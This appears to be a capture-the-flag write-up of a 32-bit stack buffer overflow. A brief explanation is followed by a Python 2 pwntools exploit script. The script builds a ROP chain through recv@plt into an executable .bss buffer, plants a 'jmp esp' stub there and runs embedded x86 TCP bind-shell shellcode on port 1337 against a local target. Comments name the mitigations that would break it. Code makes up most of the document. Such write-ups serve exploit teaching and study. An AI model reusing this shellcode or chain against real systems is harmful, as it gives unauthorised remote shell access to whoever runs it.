This binary asks 2 questions, and the answers are stored in arrays of size 128 and 1024 respectively, but that is not enough to reach EIP.
However, the binary copies our 2nd answer into a smaller buffer of size 40, which ultimately overflows far enough to reach EIP, so the trivial solution is to execute shellcode.
Load the jmp esp instruction into the RWX section (mostly 0x8040b000). Also, when using recv@plt there must be 4 arguments:
recv(fd, bss, size, flag) — passing flag=0 as the 4th argument is necessary.
# Exploit script accompanying the writeup above. It is Python 2 code: print
# statements, and str literals used directly as raw bytes. Under Python 3 the
# shellcode/padding would have to be bytes objects, so it will not run unchanged.
from pwn import *
import time
# pwntools context for a 32-bit target: pack() emits 4-byte little-endian words
context.bits=32
# Binary-specific addresses as given in the writeup (fixed addresses, i.e. the
# target is assumed non-PIE): the recv@plt stub, a pop;pop;pop;pop;ret gadget
# and the writable .bss buffer that receives the second stage.
recv=0x8048760
pop4ret = 0x8048f0c
bss=0x804b130
shellcode="\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80"
# TCP bind in port 1337
# (raw x86 shellcode; the embedded port bytes \x05\x39 = 0x0539 = 1337 agree
# with the comment above)
# Padding up to the saved return address; 60 is the distance the writeup found
# for the 40-byte destination buffer described in the text.
payload="A"*60
# Overwritten return address -> recv@plt. pop4ret then discards the four
# arguments recv(4, bss, 2, 0) (4 is presumably the client socket fd) and
# returns into bss, so the 2 bytes received there execute next; at that point
# esp points at the shellcode that follows on the stack.
# Defender's note: this chain relies on an executable .bss (RWX), fixed
# addresses (no PIE/ASLR) and an unprotected stack buffer -- NX/W^X, PIE, or a
# stack canary would each break it.
payload+=pack(recv)+pack(pop4ret)+pack(4)+pack(bss)+pack(2)+pack(0)+pack(bss)+shellcode+"\x90"*8+"\n"
#print "len of payload= %d"%len(payload)
# Local test target only; host and port are as used in the writeup.
r=remote('127.0.0.1',12345)
msg=r.recvuntil('Answer:')
print msg
print "[+] sending First answer"
# first answer: anything short, it is not the overflowing input
r.send("Hello")
msg=r.recvuntil('Answer:')
print msg
print "[+] sending payload"
r.send(payload)
# presumably gives the target time to return into the staged recv() before the
# 2-byte second stage is sent -- TODO confirm, a fixed sleep is timing-dependent
time.sleep(5)
print "[+] sending jmp inst"
# \xff\xe4 is x86 `jmp esp`; written into bss by recv(), it bounces execution
# back to the shellcode on the stack.
r.send("\xff\xe4")
r.interactive()